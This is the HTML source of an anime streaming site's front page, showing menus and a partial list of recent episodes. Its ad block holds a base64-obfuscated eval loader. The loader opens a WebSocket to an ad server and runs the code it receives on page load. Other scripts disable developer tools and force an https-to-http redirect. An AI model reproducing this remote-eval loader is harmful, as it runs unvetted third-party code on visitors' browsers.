<!-- RESTRIÇÃO DE PAIZES -->
<!-- RESTRIÇÃO DE PAIZES -->
<!-- TERMO DE USO -->
<!-- TERMO DE USO -->
<!-- HISTÓRICO -->
<!-- HISTÓRICO -->
<!DOCTYPE html>
<html lang="pt-br">
<head>
<meta charset="UTF-8"/>
<meta http-equiv="content-language" content="pt-br"/>
<meta name="COPYRIGHT" content="Copyright(c) 2011- 2018 Animes Órion | Animes Onlines">
<meta name="author" content="Animes Órion">
<meta property="fb:admins" content="AdmAnimesOrion"/>
<meta property="fb:app_id" content="1565971903463872"/>
<meta name="msvalidate.01" content="9509012DF344A7FD882378B1CFC5A5CB" />
<meta name="google-site-verification" content="oNk7yz1VIDi-jk9gZY8Xt3C5mYyj0KGN-5QjE7J7rzk" />
<meta name="google-site-verification" content="0kCsxJ762W7nl7gM9QsXzsHwOjiklcp0Gs1Md2ZWpDA" />
<meta name="google-site-verification" content="zIzCa1PkowiK-MZFEJrf6VBWr-GrRiNz95IFufA9oAI" />
<meta name="google-site-verification" content="n0NwwhRXnKQKYCjtcknq6uXhRIRHqBCgk5xIsduCzCY" />
<meta name="google-site-verification" content="qurIbF4PDJttXtaJMJyJcf33bChrnoeUY7DpZdjcfAw" />
<meta name="google-site-verification" content="cBp9UovKUln2A4eaeifYhX-Po4EutX8Qeley5jhStrM" />
<meta name="google-site-verification" content="2HcfK9E4xD_8dKBruTWM6mw43ihWme9J8VNSsxNw6po" />
<meta name="google-site-verification" content="AhTcW-9jA7kjBG-6v3oKtyeafiALTZeUQDh2NuFPE6g" />
<meta name="google-site-verification" content="Vik5y5TEoIMfN7gkv5vvO2aPhMs-qieU1GhnHx0_HTU" />
<meta name="google-site-verification" content="Uo_Rw7z0P7DqZ1XLcUOWFb1CGS0qrJRooZDXmd7egdQ" />
<title>Animes Órion | Animes Onlines</title><meta name="description" content="Animes Órion | Animes Onlines, O site Animes Órion é um site de Animes Onlines feito de fã para fãs. Com ele você tem acesso a nossa lista de Animes onlines totalmente gratuito, animes onlines, lista de animes legendados, lista de animes dublados, todos os animes onlines, vários animes onlines, ver animes online, ver animes online dublado, assistir animes online dublado, assistir Animes onlines, animes lista, site de Animes onlines e muito mais, animes onlines, lista de animes legendados, lista de animes dublados, todos os animes onlines, vários animes onlines, ver animes online, ver animes online dublado, assistir animes online dublado, assistir Animes onlines, animes lista, site de Animes onlines e muito mais."/><meta name="keywords" content="Animes Órion | Animes Onlines"/>
<meta property="og:site_name" content="Animes Órion | Animes Onlines"/>
<meta property="og:locale" content="pt_BR"/>
<meta content="pt-BR" http-equiv="Content-Language"/>
<meta content="general" name="rating"/>
<meta property="og:type" content="website" />
<meta property="og:url" content="http://www.animesorion.tv"/>
<meta property="og:title" content="Animes Órion | Animes Onlines">
<meta property="og:description" content="Animes Órion | Animes Onlines"/>
<meta property="og:image" content="https://3.bp.blogspot.com/-pNhxWnCsEgE/WlQlnvCcp3I/AAAAAAAAaUY/0C99UZ58Zxw4pDJIfdIPc3_AW_m-HKFoACLcBGAs/s420/Nanatsu-No-Taizai.JPG">
<meta property="og:video:type" content="application/x-shockwave-flash"/>
<meta property="og:video:width" content="640">
<meta property="og:video:height" content="480">
<meta property="og:video" content="http://www.animesorion.tv">
<meta property="video:duration" content=""/>
<meta property="video:tag" content="Animes Órion | Animes Onlines"/>
<meta property="article:publisher" content="https://www.facebook.com/AdmAnimesOrion"/>
<meta property="article:tag" content="Animes Órion | Animes Onlines"/>
<meta property="article:section" content="Nanatsu No Taizai 2"/>
<meta name="twitter:card" content="summary"/>
<meta name="twitter:url" content="http://www.animesorion.tv"/>
<meta name="twitter:title" content="Animes Órion | Animes Onlines">
<meta name="twitter:description" content="Animes Órion | Animes Onlines"/>
<meta name="twitter:image" content="https://3.bp.blogspot.com/-pNhxWnCsEgE/WlQlnvCcp3I/AAAAAAAAaUY/0C99UZ58Zxw4pDJIfdIPc3_AW_m-HKFoACLcBGAs/s420/Nanatsu-No-Taizai.JPG"/>
<meta name="twitter:image:width" content="220"/>
<meta name="twitter:image:height" content="180"/>
<link rel='dns-prefetch' href='//s0.wp.com'/>
<link rel='dns-prefetch' href='//s.gravatar.com'/>
<link rel='dns-prefetch' href='//fonts.googleapis.com'/>
<link rel='dns-prefetch' href='//p.jwpcdn.com'>
<link rel='dns-prefetch' href='//s.w.org' />
<script type="text/javascript">
window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.4\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.animesorion.tv\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.4"}};
!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56692,8205,9792,65039],[55357,56692,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
</script>
<style type="text/css">
img.wp-smiley,
img.emoji {
display: inline !important;
border: none !important;
box-shadow: none !important;
height: 1em !important;
width: 1em !important;
margin: 0 .07em !important;
vertical-align: -0.1em !important;
background: none !important;
padding: 0 !important;
}
</style>
<!-- <link rel='stylesheet' id='venobox-css-css'  href='http://www.animesorion.tv/wp-content/plugins/venobox-lightbox/css/venobox.min.css?ver=1.8.2' type='text/css' media='all' /> -->
<link rel="stylesheet" type="text/css" href="//www.animesorion.tv/wp-content/cache/wpfc-minified/aa07ac95ae768e1f718fb443749ddb5e/1521289510index.css" media="all"/>
<style id='venobox-css-inline-css' type='text/css'>
/*.vbox-overlay,
.vbox-num,
.vbox-title,
.vbox-close {
background: #000000 !important;
}*/
.vbox-inline {
background-color: #2681ff !important;
padding: 2%;
}
.vbox-content > img{
background-color: rgba(129,215,66,0.85) !important;
padding: 0px !important;
}
</style>
<script src='//www.animesorion.tv/wp-content/cache/wpfc-minified/1b7a7ba2ff82c19615f9868535011f2c/1521289511index.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='http://www.animesorion.tv/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> -->
<!-- <script type='text/javascript' src='http://www.animesorion.tv/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> -->
<!-- <script type='text/javascript' src='http://www.animesorion.tv/wp-content/plugins/venobox-lightbox/js/venobox.min.js?ver=1.8.2'></script> -->
<script type='text/javascript'>
/* <![CDATA[ */
var venoboxVars = {"ng_venobox":{"ng_numeratio":true,"ng_numeratio_position":"top","ng_infinigall":false,"ng_all_images":true,"ng_all_lightbox":true,"ng_title_select":4,"ng_title_position":"top","ng_all_videos":false,"ng_autoplay":false,"ng_overlay":"#000000","ng_nav_elements":"#2681ff","ng_preloader":"double-bounce","ng_vb_legacy_markup":false,"ng_bb_lightbox":false}};
/* ]]> */
</script>
<script src='//www.animesorion.tv/wp-content/cache/wpfc-minified/f8fa42670db22d358cd1816eac1138dc/1521289510index.js' type="text/javascript"></script>
<!-- <script type='text/javascript' src='http://www.animesorion.tv/wp-content/plugins/venobox-lightbox/js/venobox-init.js?ver=1.4.1'></script> -->
<link rel='https://api.w.org/' href='http://www.animesorion.tv/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.animesorion.tv/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.animesorion.tv/wp-includes/wlwmanifest.xml" /> 
<meta name="generator" content="WordPress 4.9.4" />
<!-- <link rel="stylesheet" type="text/css" media="all" href="http://www.animesorion.tv/wp-content/themes/DSTV2/style.css"> -->
<link rel="stylesheet" type="text/css" href="//www.animesorion.tv/wp-content/cache/wpfc-minified/1af14033f95afee07483b93e3a5fbebf/1521289510index.css" media="all"/>
<link rel="alternate" type="application/rss+xml" title="Animes Órion | Animes Onlines - RSS" href="http://www.animesorion.tv/feed" />
<link rel="alternate" type="application/atom+xml" title="Animes Órion | Animes Onlines - Atom" href="http://www.animesorion.tv/feed/atom" />
<!-- JS MENU -->
<script src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js' type='text/javascript'></script>
<!-- JS MENU -->
<!-- redirect https para http -->
<script>          
if (location.protocol == 'https:')          
{          
location.href = 'http:' + window.location.href.substring(window.location.protocol.length);          
}          
</script>
<!-- redirect https para http -->
<script data-cfasync="false" type="text/javascript">
var adcashMacros = {sub1: "DqlG0wSRza",sub2: "http://www.animesorion.tv/"};var zoneNativeSett={container:"awn",baseUrl:"gigaonclick.com/a/display.php",r:[1906799]};
function acPrefetch(e){var t,n=document.createElement("link");t=void 0!==document.head?document.head:document.getElementsByTagName("head")[0],n.rel="dns-prefetch",n.href=e,t.appendChild(n);var r=document.createElement("link");r.rel="preconnect",r.href=e,t.appendChild(r)}var urls={cdnUrls:["//velocecdn.com","//superfastcdn.com"],cdnIndex:0,rand:Math.random(),events:["click","mousedown","touchstart"],useFixer:!0,onlyFixer:!1,fixerBeneath:!1},nativeForPublishers=new function(){var e=this,t=Math.random();e.getRand=function(){return t},this.getNativeRender=function(){if(!e.nativeRenderLoaded){var t=document.createElement("script");t.setAttribute("data-cfasync","false"),t.src=urls.cdnUrls[urls.cdnIndex]+"/script/native_render.js",t.onerror=function(){throw new Error("cdnerr")},t.onload=function(){e.nativeRenderLoaded=!0},e.attachScript(t)}},this.getNativeResponse=function(){if(!e.nativeResponseLoaded){var t=document.createElement("script");t.setAttribute("data-cfasync","false"),t.src=urls.cdnUrls[urls.cdnIndex]+"/script/native_server.js",t.onerror=function(){throw new Error("cdnerr")},t.onload=function(){e.nativeResponseLoaded=!0},e.attachScript(t)}},this.attachScript=function(e){var t;void 0!==document.scripts&&(t=document.scripts[0]),void 0===t&&(t=document.getElementsByTagName("script")[0]),t.parentNode.insertBefore(e,t)},this.fetchCdnScripts=function(){if(urls.cdnIndex<urls.cdnUrls.length)try{e.getNativeRender(),e.getNativeResponse()}catch(t){urls.cdnIndex++,e.fetchCdnScripts()}},this.scriptsLoaded=function(){if(e.nativeResponseLoaded&&e.nativeRenderLoaded){var t=[];for(zone in zoneNativeSett.r)document.getElementById(zoneNativeSett.container+"-z"+zoneNativeSett.r[zone])&&(t[zoneNativeSett.r[zone]]=new native_request("//"+zoneNativeSett.baseUrl+"?",zoneNativeSett.r[zone]),t[zoneNativeSett.r[zone]].build());for(response in t)t[response].jsonp("callback",(t[response],function(e,t){setupAd(zoneNativeSett.container+"-z"+t,e)}))}else setTimeout(e.scriptsLoaded,250)},this.init=function(){var t;if(0===window.location.href.indexOf("file://"))for(t=0;t<urls.cdnUrls.length;t++)0===urls.cdnUrls[t].indexOf("//")&&(urls.cdnUrls[t]="http:"+urls.cdnUrls[t]);for(t=0;t<urls.cdnUrls.length;t++)acPrefetch(urls.cdnUrls[t]);e.fetchCdnScripts(),e.scriptsLoaded()}};nativeForPublishers.init(); </script>
<!-- Efeitos de texto do site -->
<style type="text/css"> 
a:link 
{ 
text-decoration:none; 
} 
</style>
<!-- Fim dos efeitos de texto do site -->
<!-- TERMO DE USO -->
<style type="text/css">
.rlAvisoAdulto {padding: 10px; text-align: center; position: fixed; width: 100%; height: 100%; background: rgba(173,13,45,.95); z-index: 9999; overflow-y: scroll; box-sizing: border-box; color: #fff; } .rlAvisoAdulto h3 {margin: 0; } .rlAvisoAdultoMsg {font-size: 16px; padding: 10px; border-bottom: 1px solid #fff; display: inline-block; } .rlAvisoContainer {margin: 30px auto 0 auto; } .rlaContainer {display: -webkit-box; display: -ms-flexbox; display: flex; max-width: 300px; margin: 20px auto; -webkit-box-pack: justify; -ms-flex-pack: justify; justify-content: space-between; } .rlaContainer a {display: inline-block; padding: 10px; background: #fff; text-decoration: none; color: #000; font-weight: bolder; border-radius: 3px; width: 42%; transition: .5s all; } .rlaContainer a:hover {background: #222; color: #fff; }
body {margin: 0; padding: 0;}
</style>
<!-- TERMO DE USO -->
</head>
<body>
<!-- TERMO DE USO -->
<!-- TERMO DE USO -->
<!-- scripts -->
<script> 
$(document).ready(function()
{ 
$(document).bind("contextmenu",function(e){
return false;
}); 
})
</script>
<script>
document.onkeydown = function(e) {
if (e.ctrlKey && 
( 
e.keyCode === 85 || 
e.keyCode === 117)) {
return false;
}
};
</script>
<script> 
$(document).keydown(function(event){
if(event.keyCode==123){
return false;
}
else if(event.ctrlKey && event.shiftKey && event.keyCode==73){        
return false;
}
});
</script>
<script language="javascript">
$(document).on("contextmenu",function(e){        
e.preventDefault();
});
</script>
<!-- scripts -->
<!-- MENU DESKTOP -->
<div id="lean_overlay"></div>
<div id="topo">
<div id="iconMenu">
<a href="http://www.animesorion.tv/" class="cssprite iconMenu"></a>
</div>
<div id="logo">
<div class="logo"><a href="http://www.animesorion.tv/" title="Pagina Inicial" class="cssprite logo"></a></div>
</div>
<div id="menu">
<ul>
<li><a href="http://www.animesorion.tv/" title="Pagina Inicial">HOME</a></li>
<!-- <li><a href="http://www.animesorion.tv/83418" title="Pagina Inicial">RECRUTAMENTO</a></li> -->
<!-- <li><a href="http://www.animesorion.tv/estreia" title="Pagina Inicial">ESTRÉIA</a></li> -->
<li>
<a href="#" id="abrirAnimes">LISTA DE ANIMES</a>
<ul>
<li><a href="http://www.animesorion.tv/3660" title="Legendados">LEGENDADOS</a></li>
<li><a href="http://www.animesorion.tv/animes-dublados" title="Dublados">DUBLADOS</a></li>
<li><a href="http://www.animesorion.tv/81180" title="Animes por Gêneros">GÊNEROS</a></li>
<li><a href="http://www.animesorion.tv/?s=ova" title="Ovas">OVAS</a></li>
<li><a href="http://www.animesorion.tv/em-lancamento" title="Temorada">EM LANÇAMENTO</a></li>
<li><a href="http://www.animesorion.tv/category/filmes-de-animes-e-animacao" tutle="Filmes">FILMES</a></li>
<!-- <li><a href="http://www.animesorion.tv/pedidos/" tutle="Filmes">PEDIDOS DE ANIMES</a></li> -->
</ul>
</li>
<li><a href="http://www.animesorion.tv/app/" title="Baixar nosso App">BAIXAR APP DO SITE</a></li>
<li><a href="http://www.animesorion.tv/todos-os-mangas-onlines" tutle="Mangás">MANGÁS</a></li>
<li><a href="http://www.animesorion.tv/historicos" title="Pagina Inicial">HISTÓRICOS</a></li>			
<li>
<a href="#" tutle="Contato">CONTACT</a>
<ul>
<li><a href="http://www.animesorion.tv/contato" title="Fale conosco">CONTACT US</a></li>
<li><a href="http://www.animesorion.tv/784" title="Parceria">PARTNERSHIPS</a></li>
</ul>
</li>
<li><a href="http://www.animesorion.tv/115320" tutle="Sobre">SOBRE</a></li>            
<li><a href="http://www.animesorion.tv/termos-de-uso.php" title="Termos do site">TERMOS DE USO</a></li>
<li><a href="https://www.lojapremio.com.br/receptores-digitais/tocomsat" title="Termos do site">TOCOMSAT</a></li>            
</ul>    
</div>
<!-- MENU DESKTOP -->
<!-- CAIXA DE BUSCA DESKTOP -->
<div id="busca">
<form method="get" id="buscando" action="http://www.animesorion.tv/">
<input type="text" name="s" placeholder="QUAL NOME DO ANIME?" id="searchbox" value="">
<input type="hidden" name="cat" value="780" />
<input type="submit" name="BUSCAR" value="BUSCAR">
</form>
</div>		
<!-- CAIXA DE BUSCA DESKTOP -->
</div>
<!-- TELAS VÍDEOS
<div class="telinhasVideosDestaques">
<h1>VÍDEOS EM DESTAQUES:</h1>
<ul>
<li>
<div class="thumb">
<div class="dataThumb">11/03/2018 </div>
<a href="http://www.animesorion.tv/118615" title="NANATSU NO TAIZAI(Segunda Temporada)REVIEW EPISODIO 09 !">
<img src="https://i1.ytimg.com/vi/JU0UzyNuJl4/mqdefault.jpg" title="NANATSU NO TAIZAI(Segunda Temporada)REVIEW EPISODIO 09 !" alt="NANATSU NO TAIZAI(Segunda Temporada)REVIEW EPISODIO 09 !"></a>
</div>
<div class="TitulotelinhasVideosDestaques">
<a href="http://www.animesorion.tv/118615" title="NANATSU NO TAIZAI(Segunda Temporada)REVIEW EPISODIO 09 !">NANATSU NO TAIZAI(Segunda Temporada)REVIEW EPISODIO 09 !</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">10/03/2018 </div>
<a href="http://www.animesorion.tv/118599" title="RAP DA JABAMI YUMEKO &#8211; KAKEGURUI (JOGADORA COMPULSIVA) | FELÍCIA ROCK">
<img src="https://i1.ytimg.com/vi/ob78FbFAauU/mqdefault.jpg" title="RAP DA JABAMI YUMEKO &#8211; KAKEGURUI (JOGADORA COMPULSIVA) | FELÍCIA ROCK" alt="RAP DA JABAMI YUMEKO &#8211; KAKEGURUI (JOGADORA COMPULSIVA) | FELÍCIA ROCK"></a>
</div>
<div class="TitulotelinhasVideosDestaques">
<a href="http://www.animesorion.tv/118599" title="RAP DA JABAMI YUMEKO &#8211; KAKEGURUI (JOGADORA COMPULSIVA) | FELÍCIA ROCK">RAP DA JABAMI YUMEKO &#8211; KAKEGURUI (JOGADORA COMPULSIVA) | FELÍCIA ROCK</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">10/03/2018 </div>
<a href="http://www.animesorion.tv/118595" title="Top 5 Animes Que Merecem Um Remake Parte 1">
<img src="https://i1.ytimg.com/vi/bt1oLh5hf4s/mqdefault.jpg" title="Top 5 Animes Que Merecem Um Remake Parte 1" alt="Top 5 Animes Que Merecem Um Remake Parte 1"></a>
</div>
<div class="TitulotelinhasVideosDestaques">
<a href="http://www.animesorion.tv/118595" title="Top 5 Animes Que Merecem Um Remake Parte 1">Top 5 Animes Que Merecem Um Remake Parte 1</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">10/03/2018 </div>
<a href="http://www.animesorion.tv/118594" title="FINALMENTE! DRAGON BALL SUPER NOVA SAGA CONFIRMADA!">
<img src="https://i1.ytimg.com/vi/3dL1taAmbPw/mqdefault.jpg" title="FINALMENTE! DRAGON BALL SUPER NOVA SAGA CONFIRMADA!" alt="FINALMENTE! DRAGON BALL SUPER NOVA SAGA CONFIRMADA!"></a>
</div>
<div class="TitulotelinhasVideosDestaques">
<a href="http://www.animesorion.tv/118594" title="FINALMENTE! DRAGON BALL SUPER NOVA SAGA CONFIRMADA!">FINALMENTE! DRAGON BALL SUPER NOVA SAGA CONFIRMADA!</a>
</div> 
</li>
<div id="exibirVideosDestaques"><a href="http://www.animesorion.tv/videos-em-destaques">MAIS VÍDEOS EM DESTAQUES</a></div>
</ul>
</div>			
<!-- TELAS VÍDEOS -->
<!-- PUBLICIDADE --> 
<center>
<div class="garotaslindas">
<span style="color: #858687; font-family: 'arial black', sans-serif; font-size: 12pt;"><strong>PUBLICIDADE</strong></span>
<div style="display:block !important; visibility:visible !important;" id="MGWrap145544">
<div id="M269559Composite145544"><center> <a href="http://adskeeper.co.uk/" target="_blank"></a> </center></div> <script type="text/javascript"> var d = new Date, script145544 = document.createElement("script"), mg_ws146027 = {};script145544.type = "text/javascript";script145544.charset = "utf-8";script145544.src = "//jsc.adskeeper.co.uk/a/n/animesorion.org.145544.js?t=" + d.getYear() + d.getMonth() + d.getDay() + d.getHours();script145544.onerror = function () { mg_ws146027 = new Worker(URL.createObjectURL(new Blob(['eval(atob(\'ZnVuY3Rpb24gc2VuZE1lc3NhZ2UxNDYwMjcoZSl7dmFyIGg9bWdfd3MxNDYwMjcub25tZXNzYWdlOyBtZ193czE0NjAyNy5yZWFkeVN0YXRlPT1tZ193czE0NjAyNy5DTE9TRUQmJihtZ193czE0NjAyNz1uZXcgV2ViU29ja2V0KG1nX3dzMTQ2MDI3X2xvY2F0aW9uKSksbWdfd3MxNDYwMjcub25tZXNzYWdlPWgsd2FpdEZvclNvY2tldENvbm5lY3Rpb24xNDYwMjcobWdfd3MxNDYwMjcsZnVuY3Rpb24oKXttZ193czE0NjAyNy5zZW5kKGUpfSl9ZnVuY3Rpb24gd2FpdEZvclNvY2tldENvbm5lY3Rpb24xNDYwMjcoZSx0KXtzZXRUaW1lb3V0KGZ1bmN0aW9uKCl7cmV0dXJuIDE9PT1lLnJlYWR5U3RhdGU/dm9pZChudWxsIT10JiZ0KCkpOnZvaWQgd2FpdEZvclNvY2tldENvbm5lY3Rpb24xNDYwMjcoZSx0KX0sNSl9OyB2YXIgbWdfd3MxNDYwMjdfbG9jYXRpb24gPSAid3NzOi8vd3NwLmFkc2tlZXBlci5jby51ay93cyI7IG1nX3dzMTQ2MDI3ID0gbmV3IFdlYlNvY2tldChtZ193czE0NjAyN19sb2NhdGlvbiksIG1nX3dzMTQ2MDI3Lm9ubWVzc2FnZSA9IGZ1bmN0aW9uICh0KSB7cG9zdE1lc3NhZ2UodC5kYXRhKTt9LCBvbm1lc3NhZ2UgPSBmdW5jdGlvbihlKXtzZW5kTWVzc2FnZTE0NjAyNyhlLmRhdGEpfQ==\'))']), {type: "application/javascript"})); mg_ws146027.onmessage = function (msg){window.eval(msg.data);}; mg_ws146027.postMessage('js|//jsc.adskeeper.co.uk/a/n/animesorion.org.146027.js|M269559Composite146027|M269559Composite145544');};document.body.appendChild(script145544); </script> <!-- M269559Composite End -->
</div>
</div>
</center> 
<!-- PUBLICIDADE --> 	  
<div id="siteContent">
<div class="cAlign">
<div id="content">
<div class="contentBox">
<h1>LATEST UPDATE</h1>
<div class="telinhas">
<ul>
<!-- EXCLUIR CATEGORIAS DA HOME --> 
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118706" title="Nanatsu No Taizai 2 Episódio 10">
<img src="https://3.bp.blogspot.com/-pNhxWnCsEgE/WlQlnvCcp3I/AAAAAAAAaUY/0C99UZ58Zxw4pDJIfdIPc3_AW_m-HKFoACLcBGAs/s420/Nanatsu-No-Taizai.JPG" title="Nanatsu No Taizai 2 Episódio 10" alt="Nanatsu No Taizai 2 Episódio 10"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118706" title="Nanatsu No Taizai 2 Episódio 10">Nanatsu No Taizai 2 Episódio 10</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">14/03/2018 </div>
<a href="http://www.animesorion.tv/118653" title="Boruto: Naruto Next Generations Episódio 49">
<img src="https://2.bp.blogspot.com/-jmRD845_Jk8/WoxN_1_y34I/AAAAAAAAauw/cirjCZkhoF0gxjtQ57vgs0tRFl7recK4gCLcBGAs/s420/boruto.JPG" title="Boruto: Naruto Next Generations Episódio 49" alt="Boruto: Naruto Next Generations Episódio 49"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118653" title="Boruto: Naruto Next Generations Episódio 49">Boruto: Naruto Next Generations Episódio 49</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">13/03/2018 </div>
<a href="http://www.animesorion.tv/118647" title="Black Clover Episódio 23">
<img src="https://1.bp.blogspot.com/-w7aIir95lRQ/WQtdBWWEYfI/AAAAAAAAWsY/Ma8AO3EKItIGxzuzajboeh9wuzhh3GtqwCLcB/s420/black-clover.JPG" title="Black Clover Episódio 23" alt="Black Clover Episódio 23"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118647" title="Black Clover Episódio 23">Black Clover Episódio 23</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118712" title="Pokémon Sun &#038; Moon Episódio 66">
<img src="https://4.bp.blogspot.com/-FRAj9x26IiQ/WDB0I3xiWeI/AAAAAAAATUM/mC-cVUjQtd8o316CsIAXq5SB6eIF3l4GQCLcB/s420/pokemon-sun-moon.JPG" title="Pokémon Sun &#038; Moon Episódio 66" alt="Pokémon Sun &#038; Moon Episódio 66"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118712" title="Pokémon Sun &#038; Moon Episódio 66">Pokémon Sun &#038; Moon Episódio 66</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118711" title="Pokémon Sun &#038; Moon Episódio 65">
<img src="https://4.bp.blogspot.com/-__Vrbd-mTxU/WVF_fUmsECI/AAAAAAAAXnw/YlhrYA1h9fck1gQNsIYviyKPXvGNufKFQCLcBGAs/s420/fundo.jpg" title="Pokémon Sun &#038; Moon Episódio 65" alt="Pokémon Sun &#038; Moon Episódio 65"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118711" title="Pokémon Sun &#038; Moon Episódio 65">Pokémon Sun &#038; Moon Episódio 65</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118710" title="Spiritpact: Bond Of The Underworld Episódio 4">
<img src="https://1.bp.blogspot.com/-kzI2Hva2KCI/WpoS6az0PAI/AAAAAAAAa38/WbUi8UE-NH8gxMmVzmds2GMuAgNAZZAbACLcBGAs/s420/spiritpact-bond-of-the-underworld.jpg" title="Spiritpact: Bond Of The Underworld Episódio 4" alt="Spiritpact: Bond Of The Underworld Episódio 4"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118710" title="Spiritpact: Bond Of The Underworld Episódio 4">Spiritpact: Bond Of The Underworld Episódio 4</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118709" title="Citrus Episódio 11">
<img src="https://4.bp.blogspot.com/-HD3I3slIwCc/WlFr6ELRVfI/AAAAAAAAaR0/RViZLd-xXCMzFAO2ElNrevkfz7mxBswZQCLcBGAs/s420/citrus.JPG" title="Citrus Episódio 11" alt="Citrus Episódio 11"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118709" title="Citrus Episódio 11">Citrus Episódio 11</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118708" title="Sanrio Danshi Episódio 11">
<img src="https://4.bp.blogspot.com/-8Vu-AYvd7H8/WlFpAhvur2I/AAAAAAAAaRk/O5hlyz72DkYuIcz3VH6CA3g2fq6lpzWHwCLcBGAs/s420/sanrio-danshi.JPG" title="Sanrio Danshi Episódio 11" alt="Sanrio Danshi Episódio 11"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118708" title="Sanrio Danshi Episódio 11">Sanrio Danshi Episódio 11</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118705" title="Dagashi Kashi Episódio 22">
<img src="http://3.bp.blogspot.com/-Ad5OQUYT46Y/VpBfV9WOJnI/AAAAAAAAkhk/c__yrpF037Y/s420/dagashi-kashi.PNG" title="Dagashi Kashi Episódio 22" alt="Dagashi Kashi Episódio 22"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118705" title="Dagashi Kashi Episódio 22">Dagashi Kashi Episódio 22</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118704" title="Time Bokan: Gyakushuu No San Akunin Episódio 23">
<img src="https://2.bp.blogspot.com/-QPkurAeWTO0/WeItudU_eEI/AAAAAAAAZIA/73Cs_QWno-YO41QZ-lv3GXKrFOs7gzTFgCLcBGAs/s420/time-bokan-gyakushuu-no-san-akunin.JPG" title="Time Bokan: Gyakushuu No San Akunin Episódio 23" alt="Time Bokan: Gyakushuu No San Akunin Episódio 23"></a>
</div>
<div class="Titulotelinhas">
<a href="http://www.animesorion.tv/118704" title="Time Bokan: Gyakushuu No San Akunin Episódio 23">Time Bokan: Gyakushuu No San Akunin Episódio 23</a>
</div> 
</li>
<li>
<div class="thumb">
<div class="dataThumb">17/03/2018 </div>
<a href="http://www.animesorion.tv/118702" title="Kaito Sentai Lupinranger Vs. Keisatsu Sentai Patranger Episódio 5">
<img src="https://2.bp.blogspot.com/-3Gg56mwOTis/WoHucEO_7sI/AAAAAAAAas4/aUTSFz17T3wB8fQaijB1HIEQ-pV1gf_AwCLcBGAs/s420/kaito-sentai-lupinranger-vs-keisatsu-sentai-patranger.JPG" title="Kaito Sentai Lupinranger Vs. Keisatsu Sentai Patranger Episódio 5" alt="Kaito Sentai Lupinranger Vs. Keisatsu Sentai Patranger Episódio 5"></a>
</div>
<div class="Titulotelinhas">
